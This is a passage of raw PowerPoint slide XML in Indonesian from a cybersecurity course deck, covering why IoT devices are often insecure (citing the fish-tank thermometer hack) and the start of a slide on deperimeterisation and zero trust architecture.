              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Tangki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Ikan yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Internet" https://thehackernews.com/2018/04/iot-hacking-thermometer.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karakteristik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buruk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsionalitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbatas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Banyak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbiaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyulitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Banyak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terburu-buru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sadar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT. Banyak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyadari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firmware.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>145</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="122118887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Deperimeterisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan Nol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kepercayaan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Muncul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kepercayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (ZTA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ketergantungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendorong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Platform cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
